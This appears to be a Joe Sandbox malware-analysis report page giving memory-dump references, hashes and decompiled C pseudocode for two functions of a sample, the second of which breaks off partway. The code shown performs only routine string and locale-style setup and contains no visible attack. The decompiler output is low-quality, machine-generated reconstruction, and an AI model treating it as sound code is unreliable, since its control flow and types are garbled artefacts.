Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 632a7db385dd1ce2f44da4d92cbc32f6ea3c100251b45c87d2400fa2cc677690
Instruction ID: 5a07d1eba5bf0b921f5115602c6eba4cd44856067046badbc980df595ea2368e
Opcode Fuzzy Hash: 632a7db385dd1ce2f44da4d92cbc32f6ea3c100251b45c87d2400fa2cc677690
Instruction Fuzzy Hash: 53F14EB4A0160ACFCB40EFACC08496EFBF1FF94214B51855AE895DB365E734E946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0145C9E0 Relevance: 5.4, APIs: 4, Instructions: 369
stringCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0145C9E0(char __ecx, void* __eflags, char _a4) {
				void* _v16;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				signed char* _v48;
				char* _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t143;
				intOrPtr* _t145;
				char _t147;
				void* _t151;
				char _t158;
				intOrPtr _t160;
				intOrPtr* _t163;
				char _t165;
				char _t167;
				intOrPtr _t169;
				intOrPtr* _t172;
				char _t174;
				char _t178;
				intOrPtr _t180;
				intOrPtr* _t183;
				intOrPtr _t185;
				signed char* _t186;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t190;
				intOrPtr* _t191;
				signed int _t192;
				intOrPtr* _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				intOrPtr _t202;
				intOrPtr* _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr _t208;
				intOrPtr _t210;
				char* _t211;
				char _t245;
				char _t246;
				char _t251;
				char _t254;
				intOrPtr _t257;
				char _t266;
				signed char* _t276;
				signed char* _t278;
				void* _t279;
				char* _t282;
				intOrPtr _t284;
				signed char* _t285;
				char* _t286;
				wchar_t* _t287;
				wchar_t* _t288;
				wchar_t* _t289;
				char _t290;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;
				signed char** _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;

				_t245 = __ecx;
				_t295 = _t294 - 0x4c;
				_v92 = _a4;
				_t143 = E01474D80(__eflags);
				_t290 = _t143;
				_t145 =  *((intOrPtr*)( *_t143 + 0x14));
				if(_t145 != E013EB350) {
					_v92 = _t290;
					 *_t145();
					_t147 = _v32;
					_t295 = _t295 - 4;
				} else {
					_t275 = 0xfffffffe;
					_t289 =  *( *((intOrPtr*)(_t290 + 8)) + 0x18);
					if(_t289 != 0) {
						_t275 = _t289 + wcslen(_t289) * 2;
					}
					_t147 = E0142F990(_t289, _t245,  &_v33, _t275, _t289, _t290, _t293);
					_v32 = _t147;
				}
				_t284 =  *((intOrPtr*)(_t147 - 0xc));
				_v64 = _t284;
				if(_t284 > 0x3ffffffe) {
					E01479D50(_t245);
					_t151 = E0142FE70(_v32 - 0xc,  &_v33);
					_v100 = _t245;
					E013D8C90(_t151, _t245, _t275, _t284, _t290);
					L63:
					_t246 = E01479D50(_t245);
					while(1) {
						L59:
						_t154 = _v52;
						_v96 = _v52;
						L01477900();
						while(1) {
							_v96 = _t246;
							E013D8C90(_t154, _t246, _t275, _t284, _t290);
							_v96 = _v60;
							L01477900();
							_t154 = _v56;
							_v96 = _v56;
							L01477900();
							__eflags = _v52;
							if(_v52 != 0) {
								goto L59;
							}
						}
					}
				}
				_t158 = L01477930(_t284 + _t284);
				_v52 = _t158;
				_v88 = 0;
				_v92 = _t284;
				_v96 = _t158;
				E013E90E0(_t245,  &_v32);
				_t160 =  *0x14a31d0; // 0x2
				_t251 = _v32;
				_t296 = _t295 - 0xc;
				if(_t160 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L7;
					} else {
						goto L46;
					}
					goto L25;
				} else {
					_t18 =  *((intOrPtr*)(_t251 - 4)) - 1; // -1
					_t275 = _t18;
					 *((intOrPtr*)(_t251 - 4)) = _t18;
					if( *((intOrPtr*)(_t251 - 4)) <= 0) {
						L46:
						_v96 =  &_v33;
						E0142FE50( &_v33, _t251 - 0xc);
						_t296 = _t296 - 4;
						_t163 =  *((intOrPtr*)( *_t290 + 0x18));
						__eflags = _t163 - E013EB3F0;
						if(_t163 == E013EB3F0) {
							goto L8;
						} else {
							goto L47;
						}
						L25:
						_t276 =  *(_t185 - 0xc);
						_v48 = _t276;
						 *_t298 = _t276;
						_t186 = L01477930();
						_v100 = 0;
						_t285 = _t186;
						 *_t298 = _t186;
						_v104 = _v48;
						E013EA140(_t245,  &_v32);
						_t278 = _v48;
						 *(_t245 + 8) = _t285;
						_t299 = _t298 - 0xc;
						_t188 = 0;
						 *(_t245 + 0xc) = _t278;
						if(_t278 != 0) {
							_t188 = ( *_t285 & 0x000000ff) - 0x00000001 & 0xffffff00 | ( *_t285 & 0x000000ff) - 0x00000001 - 0x0000007d < 0x00000000;
						}
						_t279 =  *_t290;
						 *(_t245 + 0x10) = _t188;
						_t189 =  *((intOrPtr*)(_t279 + 8));
						if(_t189 != E013EB3A0) {
							_t190 =  *_t189();
							_t279 =  *_t290;
						} else {
							_t190 =  *( *((intOrPtr*)(_t290 + 8)) + 0x12) & 0x0000ffff;
						}
						 *(_t245 + 0x12) = _t190;
						_t191 =  *((intOrPtr*)(_t279 + 0xc));
						if(_t191 != E013EB430) {
							_t192 =  *_t191();
							_t279 =  *_t290;
						} else {
							_t192 =  *( *((intOrPtr*)(_t290 + 8)) + 0x14) & 0x0000ffff;
						}
						 *(_t245 + 0x14) = _t192;
						 *(_t245 + 0x18) = _v52;
						 *((intOrPtr*)(_t245 + 0x1c)) = _v64;
						 *((intOrPtr*)(_t245 + 0x20)) = _v56;
						 *((intOrPtr*)(_t245 + 0x24)) = _v68;
						 *((intOrPtr*)(_t245 + 0x28)) = _v60;
						 *((intOrPtr*)(_t245 + 0x2c)) = _v72;
						_t199 =  *((intOrPtr*)(_t279 + 0x20));
						if(_t199 != E013EB390) {
							_t200 =  *_t199();
							_t279 =  *_t290;
						} else {
							_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x30));
						}
						 *((intOrPtr*)(_t245 + 0x30)) = _t200;
						_t201 =  *((intOrPtr*)(_t279 + 0x24));
						if(_t201 != E013EB240) {
							_t202 =  *_t201();
						} else {
							_t202 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x34));
						}
						 *((intOrPtr*)(_t245 + 0x34)) = _t202;
						_t204 =  *((intOrPtr*)( *_t290 + 0x28));
						_t329 = _t204 - E013EB230;
						if(_t204 != E013EB230) {
							_t205 =  *_t204();
						} else {
							_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 8)) + 0x38));
						}
						 *((intOrPtr*)(_t245 + 0x38)) = _t205;
						 *_t299 = _a4;
						_t207 = E01474F60(_t329);
						_t208 =  *0x14a4668; // 0x14ab360
						_t107 = _t245 + 0x3c; // 0x3c
						_v100 = _t107;
						_t109 = _t208 + 0xb; // 0x14ab36b
						 *_t299 = _t208;
						_v104 = _t109;
						 *((intOrPtr*)( *_t207 + 0x2c))();
						_t210 =  *0x14a31d0; // 0x2
						_t266 = _v32;
						 *((char*)(_t245 + 0x52)) = 1;
						_t300 = _t299 - 0xc;
						if(_t210 != 0) {
							_t211 = 0xffffffff;
							asm("lock xadd [ecx-0x4], eax");
							__eflags = 0xffffffff;
							if(0xffffffff > 0) {
								goto L39;
							} else {
								goto L44;
							}
						} else {
							_t211 =  *(_t266 - 4);
							_t115 = _t211 - 1; // -1
							 *(_t266 - 4) = _t115;
							if(_t211 <= 0) {
								L44:
								__eflags = _t266 - 0xc;
								 *_t300 =  &_v33;
								return E01438FD0( &_v33, _t266 - 0xc);
							} else {
								L39:
								return _t211;
							}
						}
					} else {
						L7:
						_t163 =  *((intOrPtr*)( *_t290 + 0x18));
						if(_t163 != E013EB3F0) {
							L47:
							_v96 = _t290;
							 *_t163();
							_t165 = _v32;
							_t296 = _t296 - 4;
						} else {
							L8:
							_t275 = 0xfffffffe;
							_t288 =  *( *((intOrPtr*)(_t290 + 8)) + 0x20);
							if(_t288 != 0) {
								_t275 = _t288 + wcslen(_t288) * 2;
							}
							_t165 = E0142F990(_t288, _t245,  &_v35, _t275, _t288, _t290, _t293);
							_v32 = _t165;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t165 - 0xc));
				_v68 = _t284;
				if(_t284 > 0x3ffffffe) {
					goto L63;
				}
				_t167 = L01477930(_t284 + _t284);
				_v56 = _t167;
				_v92 = 0;
				_v96 = _t284;
				_v100 = _t167;
				E013E90E0(_t245,  &_v32);
				_t169 =  *0x14a31d0; // 0x2
				_t254 = _v32;
				_t297 = _t296 - 0xc;
				if(_t169 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L14;
					} else {
						goto L41;
					}
					goto L25;
				} else {
					_t36 =  *((intOrPtr*)(_t254 - 4)) - 1; // -1
					_t275 = _t36;
					 *((intOrPtr*)(_t254 - 4)) = _t36;
					if( *((intOrPtr*)(_t254 - 4)) <= 0) {
						L41:
						_v100 =  &_v33;
						E0142FE50( &_v33, _t254 - 0xc);
						_t297 = _t297 - 4;
						_t172 =  *((intOrPtr*)( *_t290 + 0x1c));
						__eflags = _t172 - E013EB3B0;
						if(_t172 == E013EB3B0) {
							goto L15;
						} else {
							goto L42;
						}
						goto L25;
					} else {
						L14:
						_t172 =  *((intOrPtr*)( *_t290 + 0x1c));
						if(_t172 != E013EB3B0) {
							L42:
							_v100 = _t290;
							 *_t172();
							_t174 = _v32;
							_t297 = _t297 - 4;
						} else {
							L15:
							_t275 = 0xfffffffe;
							_t287 =  *( *((intOrPtr*)(_t290 + 8)) + 0x28);
							if(_t287 != 0) {
								_t275 = _t287 + wcslen(_t287) * 2;
							}
							_t174 = E0142F990(_t287, _t245,  &_v34, _t275, _t287, _t290, _t293);
							_v32 = _t174;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t174 - 0xc));
				_v72 = _t284;
				if(_t284 > 0x3ffffffe) {
					_t246 = E01479D50(_t245);
					_v104 = _v56;
					L01477900();
					goto L59;
				}
				_t178 = L01477930(_t284 + _t284);
				_v60 = _t178;
				_v96 = 0;
				_v100 = _t284;
				_v104 = _t178;
				E013E90E0(_t245,  &_v32);
				_t180 =  *0x14a31d0; // 0x2
				_t257 = _v32;
				_t298 = _t297 - 0xc;
				if(_t180 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L21;
					} else {
						goto L49;
					}
				} else {
					_t54 =  *((intOrPtr*)(_t257 - 4)) - 1; // -1
					 *((intOrPtr*)(_t257 - 4)) = _t54;
					if( *((intOrPtr*)(_t257 - 4)) <= 0) {
						L49:
						_v104 =  &_v33;
						E0142FE50( &_v33, _t257 - 0xc);
						_t298 = _t298 - 4;
						_t183 =  *((intOrPtr*)( *_t290 + 0x10));
						__eflags = _t183 - E013EB1B0;
						if(_t183 == E013EB1B0) {
							goto L22;
						} else {
							goto L50;
						}
					} else {
						L21:
						_t183 =  *((intOrPtr*)( *_t290 + 0x10));
						if(_t183 != E013EB1B0) {
							L50:
							_v104 = _t290;
							 *_t183();
							_t185 = _v32;
							_t298 = _t298 - 4;
						} else {
							L22:
							_t282 = 0xffffffff;
							_t286 =  *( *((intOrPtr*)(_t290 + 8)) + 8);
							if(_t286 != 0) {
								_t282 =  &(_t286[strlen(_t286)]);
							}
							_t185 = E01438AF0(_t286, _t245,  &_v33, _t282, _t286, _t290, _t293);
							_v32 = _t185;
						}
					}
				}
				goto L25;
			}

0x0145c9e6
0x0145c9e8
0x0145c9ee
0x0145c9f1
0x0145c9f6
0x0145c9fa
0x0145ca02
0x0145ce40
0x0145ce46
0x0145ce48
0x0145ce4b
0x0145ca08
0x0145ca0b
0x0145ca10
0x0145ca15
0x0145ca1f
0x0145ca1f
0x0145ca27
0x0145ca2c
0x0145ca2c
0x0145ca2f
0x0145ca32
0x0145ca3b
0x0145cf40
0x0145cf51
0x0145cf57
0x0145cf5a
0x0145cf5f
0x0145cf64
0x0145cee6
0x0145cee6
0x0145cee6
0x0145cee9
0x0145ceec
0x0145cef1
0x0145cef1
0x0145cef4
0x0145cefc
0x0145ceff
0x0145cf04
0x0145cf07
0x0145cf0a
0x0145cf0f
0x0145cf13
0x00000000
0x00000000
0x0145cf15
0x0145cef1
0x0145cee6
0x0145ca47
0x0145ca4c
0x0145ca52
0x0145ca5a
0x0145ca5e
0x0145ca61
0x0145ca66
0x0145ca6b
0x0145ca6e
0x0145ca73
0x0145cda5
0x0145cdaa
0x0145cdac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145ca79
0x0145ca7c
0x0145ca7c
0x0145ca7f
0x0145ca84
0x0145cdb2
0x0145cdb8
0x0145cdbb
0x0145cdc2
0x0145cdc5
0x0145cdc8
0x0145cdcd
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cbe5
0x0145cbe5
0x0145cbe8
0x0145cbeb
0x0145cbee
0x0145cbf3
0x0145cc01
0x0145cc03
0x0145cc06
0x0145cc0a
0x0145cc0f
0x0145cc12
0x0145cc15
0x0145cc18
0x0145cc1a
0x0145cc1f
0x0145cc29
0x0145cc29
0x0145cc2c
0x0145cc2e
0x0145cc31
0x0145cc39
0x0145ce9a
0x0145ce9c
0x0145cc3f
0x0145cc42
0x0145cc42
0x0145cc46
0x0145cc4a
0x0145cc52
0x0145ce8a
0x0145ce8c
0x0145cc58
0x0145cc5b
0x0145cc5b
0x0145cc5f
0x0145cc66
0x0145cc6c
0x0145cc72
0x0145cc78
0x0145cc7e
0x0145cc84
0x0145cc87
0x0145cc8f
0x0145ce7a
0x0145ce7c
0x0145cc95
0x0145cc98
0x0145cc98
0x0145cc9b
0x0145cc9e
0x0145cca6
0x0145ce6a
0x0145ccac
0x0145ccaf
0x0145ccaf
0x0145ccb2
0x0145ccb7
0x0145ccba
0x0145ccbf
0x0145ce5a
0x0145ccc5
0x0145ccc8
0x0145ccc8
0x0145cccb
0x0145ccd1
0x0145ccd4
0x0145ccdb
0x0145cce0
0x0145cce5
0x0145cce9
0x0145ccec
0x0145ccef
0x0145ccf3
0x0145ccf6
0x0145ccfb
0x0145ccfe
0x0145cd02
0x0145cd07
0x0145cd70
0x0145cd75
0x0145cd7a
0x0145cd7c
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cd09
0x0145cd09
0x0145cd0c
0x0145cd0f
0x0145cd14
0x0145cd7e
0x0145cd81
0x0145cd84
0x0145cd96
0x0145cd16
0x0145cd16
0x0145cd1d
0x0145cd1d
0x0145cd14
0x0145ca8a
0x0145ca8a
0x0145ca8c
0x0145ca94
0x0145cdd3
0x0145cdd3
0x0145cdd9
0x0145cddb
0x0145cdde
0x0145ca9a
0x0145ca9a
0x0145ca9d
0x0145caa2
0x0145caa7
0x0145cab1
0x0145cab1
0x0145cab9
0x0145cabe
0x0145cabe
0x0145ca94
0x0145ca84
0x0145cac1
0x0145cac4
0x0145cacd
0x00000000
0x00000000
0x0145cad9
0x0145cade
0x0145cae4
0x0145caec
0x0145caf0
0x0145caf3
0x0145caf8
0x0145cafd
0x0145cb00
0x0145cb05
0x0145cd25
0x0145cd2a
0x0145cd2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cb0b
0x0145cb0e
0x0145cb0e
0x0145cb11
0x0145cb16
0x0145cd32
0x0145cd38
0x0145cd3b
0x0145cd42
0x0145cd45
0x0145cd48
0x0145cd4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cb1c
0x0145cb1c
0x0145cb1e
0x0145cb26
0x0145cd53
0x0145cd53
0x0145cd59
0x0145cd5b
0x0145cd5e
0x0145cb2c
0x0145cb2c
0x0145cb2f
0x0145cb34
0x0145cb39
0x0145cb43
0x0145cb43
0x0145cb4b
0x0145cb50
0x0145cb50
0x0145cb26
0x0145cb16
0x0145cb53
0x0145cb56
0x0145cb5f
0x0145cebd
0x0145cede
0x0145cee1
0x00000000
0x0145cee1
0x0145cb6b
0x0145cb70
0x0145cb76
0x0145cb7e
0x0145cb82
0x0145cb85
0x0145cb8a
0x0145cb8f
0x0145cb92
0x0145cb97
0x0145cdf5
0x0145cdfa
0x0145cdfc
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cb9d
0x0145cba0
0x0145cba3
0x0145cba8
0x0145ce02
0x0145ce08
0x0145ce0b
0x0145ce12
0x0145ce15
0x0145ce18
0x0145ce1d
0x00000000
0x00000000
0x00000000
0x00000000
0x0145cbae
0x0145cbae
0x0145cbb0
0x0145cbb8
0x0145ce23
0x0145ce23
0x0145ce29
0x0145ce2b
0x0145ce2e
0x0145cbbe
0x0145cbbe
0x0145cbc1
0x0145cbc6
0x0145cbcb
0x0145cbd5
0x0145cbd5
0x0145cbdd
0x0145cbe2
0x0145cbe2
0x0145cbb8
0x0145cba8
0x00000000

APIs

wcslen.MSVCRT ref: 0145CA1A
wcslen.MSVCRT ref: 0145CAAC
wcslen.MSVCRT ref: 0145CB3E
strlen.MSVCRT ref: 0145CBD0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 6cfa3a3e9ced4a8bb5e2b29e8e1abd3a0682b21396aa2756b098524caf69cead
Instruction ID: cb8a8108793dc1896698c090eb7b9d20003c277709fd7bfe07d82459017d8994
Opcode Fuzzy Hash: 6cfa3a3e9ced4a8bb5e2b29e8e1abd3a0682b21396aa2756b098524caf69cead
Instruction Fuzzy Hash: 49F147B4A007068FCB50EF6CC0C496EFBF5BF94220B51895AE895DB365E730E946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0145C1E0 Relevance: 5.4, APIs: 4, Instructions: 352
stringCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E0145C1E0(void* __ecx, void* __eflags, char _a4) {
				void* _v16;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				signed char* _v48;
				char _v52;
				signed char* _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char* _v72;
				signed char* _v88;
				void* _v92;
				void* _v96;
				signed char* _v100;
				void* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t139;
				intOrPtr* _t141;
				char _t143;
				char _t144;
				intOrPtr _t146;
				intOrPtr* _t149;
				char _t151;
				signed char* _t152;
				intOrPtr _t154;
				intOrPtr* _t157;
				char _t159;
				char _t160;
				intOrPtr _t162;
				intOrPtr* _t165;
				char _t167;
				signed char* _t168;
				signed int _t170;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr* _t175;
				signed int _t176;
				intOrPtr* _t183;
				intOrPtr _t184;
				intOrPtr* _t185;
				intOrPtr _t186;
				intOrPtr* _t188;
				intOrPtr _t189;
				signed int _t193;
				intOrPtr _t197;
				char* _t198;
				intOrPtr* _t203;
				intOrPtr* _t237;
				intOrPtr* _t238;
				signed char* _t239;
				char _t243;
				char _t246;
				char _t249;
				char _t257;
				signed char* _t268;
				signed char* _t270;
				intOrPtr _t271;
				char* _t275;
				char* _t277;
				char* _t279;
				char* _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed char* _t284;
				signed char* _t285;
				intOrPtr* _t286;
				char* _t287;
				char* _t288;
				char* _t289;
				char* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				signed char** _t297;
				intOrPtr* _t298;

				_t291 = __ecx;
				_t294 = _t293 - 0x4c;
				_v92 = _a4;
				_t139 = E01474D20(__eflags);
				_t237 = _t139;
				_t141 =  *((intOrPtr*)( *_t139 + 0x14));
				if(_t141 != E013EAFA0) {
					_v92 = _t237;
					 *_t141();
					_t143 = _v32;
					_t294 = _t294 - 4;
				} else {
					_t281 = 0xffffffff;
					_t290 =  *( *((intOrPtr*)(_t237 + 8)) + 0x14);
					if(_t290 != 0) {
						_t281 =  &(_t290[strlen(_t290)]);
					}
					_t143 = E01438A70(_t290, _t237,  &_v33, _t281, _t290, _t291, _t292);
					_v32 = _t143;
				}
				_t282 =  *((intOrPtr*)(_t143 - 0xc));
				_v64 = _t282;
				_t144 = L01477930(_t282);
				_v52 = _t144;
				_v88 = 0;
				_v92 = _t282;
				_v96 = _t144;
				E013EA140(_t237,  &_v32);
				_t146 =  *0x14a31d0; // 0x2
				_t243 = _v32;
				_t295 = _t294 - 0xc;
				if(_t146 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L6;
					} else {
						goto L42;
					}
					goto L60;
				} else {
					_t16 =  *((intOrPtr*)(_t243 - 4)) - 1; // -1
					 *((intOrPtr*)(_t243 - 4)) = _t16;
					if( *((intOrPtr*)(_t243 - 4)) <= 0) {
						L42:
						_v96 =  &_v33;
						E01438FD0( &_v33, _t243 - 0xc);
						_t295 = _t295 - 4;
						_t149 =  *((intOrPtr*)( *_t237 + 0x18));
						__eflags = _t149 - E013EB040;
						if(_t149 == E013EB040) {
							goto L7;
						} else {
							goto L43;
						}
						L60:
					} else {
						L6:
						_t149 =  *((intOrPtr*)( *_t237 + 0x18));
						if(_t149 != E013EB040) {
							L43:
							_v96 = _t237;
							 *_t149();
							_t151 = _v32;
							_t295 = _t295 - 4;
						} else {
							L7:
							_t279 = 0xffffffff;
							_t289 =  *( *((intOrPtr*)(_t237 + 8)) + 0x1c);
							if(_t289 != 0) {
								_t279 =  &(_t289[strlen(_t289)]);
							}
							_t151 = E01438A70(_t289, _t237,  &_v35, _t279, _t289, _t291, _t292);
							_v32 = _t151;
						}
					}
				}
				_t283 =  *((intOrPtr*)(_t151 - 0xc));
				_v68 = _t283;
				_t152 = L01477930(_t283);
				_v56 = _t152;
				_v92 = 0;
				_v96 = _t283;
				_v100 = _t152;
				E013EA140(_t237,  &_v32);
				_t154 =  *0x14a31d0; // 0x2
				_t246 = _v32;
				_t296 = _t295 - 0xc;
				if(_t154 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L12;
					} else {
						goto L50;
					}
					goto L38;
				} else {
					_t32 =  *((intOrPtr*)(_t246 - 4)) - 1; // -1
					 *((intOrPtr*)(_t246 - 4)) = _t32;
					if( *((intOrPtr*)(_t246 - 4)) <= 0) {
						L50:
						_v100 =  &_v33;
						E01438FD0( &_v33, _t246 - 0xc);
						_t296 = _t296 - 4;
						_t157 =  *((intOrPtr*)( *_t237 + 0x1c));
						__eflags = _t157 - E013EB000;
						if(_t157 == E013EB000) {
							goto L13;
						} else {
							goto L51;
						}
						L38:
						_t197 =  *0x14a31d0; // 0x2
						_t257 = _v32;
						 *((char*)(_t291 + 0x43)) = 1;
						if(_t197 != 0) {
							_t198 = 0xffffffff;
							asm("lock xadd [ecx-0x4], eax");
							__eflags = 0xffffffff;
							if(0xffffffff > 0) {
								goto L40;
							} else {
								goto L45;
							}
						} else {
							_t198 =  *(_t257 - 4);
							_t114 = _t198 - 1; // -1
							 *(_t257 - 4) = _t114;
							if(_t198 <= 0) {
								L45:
								__eflags = _t257 - 0xc;
								 *_t298 =  &_v33;
								return E01438FD0( &_v33, _t257 - 0xc);
							} else {
								L40:
								return _t198;
							}
						}
						goto L60;
					} else {
						L12:
						_t157 =  *((intOrPtr*)( *_t237 + 0x1c));
						if(_t157 != E013EB000) {
							L51:
							_v100 = _t237;
							 *_t157();
							_t159 = _v32;
							_t296 = _t296 - 4;
						} else {
							L13:
							_t277 = 0xffffffff;
							_t288 =  *( *((intOrPtr*)(_t237 + 8)) + 0x24);
							if(_t288 != 0) {
								_t277 =  &(_t288[strlen(_t288)]);
							}
							_t159 = E01438A70(_t288, _t237,  &_v34, _t277, _t288, _t291, _t292);
							_v32 = _t159;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t159 - 0xc));
				_v72 = _t284;
				_t160 = L01477930(_t284);
				_v60 = _t160;
				_v96 = 0;
				_v100 = _t284;
				_v104 = _t160;
				E013EA140(_t237,  &_v32);
				_t162 =  *0x14a31d0; // 0x2
				_t249 = _v32;
				_t297 = _t296 - 0xc;
				if(_t162 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L18;
					} else {
						goto L47;
					}
					goto L60;
				} else {
					_t48 =  *((intOrPtr*)(_t249 - 4)) - 1; // -1
					 *((intOrPtr*)(_t249 - 4)) = _t48;
					if( *((intOrPtr*)(_t249 - 4)) <= 0) {
						L47:
						_v104 =  &_v33;
						E01438FD0( &_v33, _t249 - 0xc);
						_t297 = _t297 - 4;
						_t165 =  *((intOrPtr*)( *_t237 + 0x10));
						__eflags = _t165 - E013EAE00;
						if(_t165 == E013EAE00) {
							goto L19;
						} else {
							goto L48;
						}
						goto L60;
					} else {
						L18:
						_t165 =  *((intOrPtr*)( *_t237 + 0x10));
						if(_t165 != E013EAE00) {
							L48:
							_v104 = _t237;
							 *_t165();
							_t167 = _v32;
							_t297 = _t297 - 4;
						} else {
							L19:
							_t275 = 0xffffffff;
							_t287 =  *( *((intOrPtr*)(_t237 + 8)) + 8);
							if(_t287 != 0) {
								_t275 =  &(_t287[strlen(_t287)]);
							}
							_t167 = E01438A70(_t287, _t237,  &_v33, _t275, _t287, _t291, _t292);
							_v32 = _t167;
						}
					}
				}
				_t268 =  *(_t167 - 0xc);
				_v48 = _t268;
				 *_t297 = _t268;
				_t168 = L01477930();
				_v100 = 0;
				_t285 = _t168;
				 *_t297 = _t168;
				_v104 = _v48;
				E013EA140(_t237,  &_v32);
				_t270 = _v48;
				 *(_t291 + 8) = _t285;
				_t298 = _t297 - 0xc;
				_t170 = 0;
				 *((intOrPtr*)(_t291 + 0xc)) = _t270;
				if(_t270 != 0) {
					_t170 = ( *_t285 & 0x000000ff) - 0x00000001 & 0xffffff00 | ( *_t285 & 0x000000ff) - 0x00000001 - 0x0000007d < 0x00000000;
				}
				 *(_t291 + 0x10) = _t170;
				_t172 =  *((intOrPtr*)( *_t237 + 8));
				if(_t172 != E013EAFF0) {
					_t173 =  *_t172();
				} else {
					_t173 =  *( *((intOrPtr*)(_t237 + 8)) + 0x11) & 0x000000ff;
				}
				 *(_t291 + 0x11) = _t173;
				_t175 =  *((intOrPtr*)( *_t237 + 0xc));
				if(_t175 != E013EB080) {
					_t176 =  *_t175();
				} else {
					_t176 =  *( *((intOrPtr*)(_t237 + 8)) + 0x12) & 0x000000ff;
				}
				 *(_t291 + 0x12) = _t176;
				_t271 =  *_t237;
				 *((intOrPtr*)(_t291 + 0x14)) = _v52;
				 *((intOrPtr*)(_t291 + 0x18)) = _v64;
				 *((intOrPtr*)(_t291 + 0x1c)) = _v56;
				 *((intOrPtr*)(_t291 + 0x20)) = _v68;
				 *((intOrPtr*)(_t291 + 0x24)) = _v60;
				 *((intOrPtr*)(_t291 + 0x28)) = _v72;
				_t183 =  *((intOrPtr*)(_t271 + 0x20));
				if(_t183 != E013EAFE0) {
					_t184 =  *_t183();
					_t271 =  *_t237;
				} else {
					_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x2c));
				}
				 *((intOrPtr*)(_t291 + 0x2c)) = _t184;
				_t185 =  *((intOrPtr*)(_t271 + 0x24));
				if(_t185 != E013EAE90) {
					_t186 =  *_t185();
				} else {
					_t186 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x30));
				}
				 *((intOrPtr*)(_t291 + 0x30)) = _t186;
				_t188 =  *((intOrPtr*)( *_t237 + 0x28));
				_t324 = _t188 - E013EAE80;
				if(_t188 != E013EAE80) {
					_t189 =  *_t188();
				} else {
					_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x34));
				}
				 *((intOrPtr*)(_t291 + 0x34)) = _t189;
				 *_t298 = _a4;
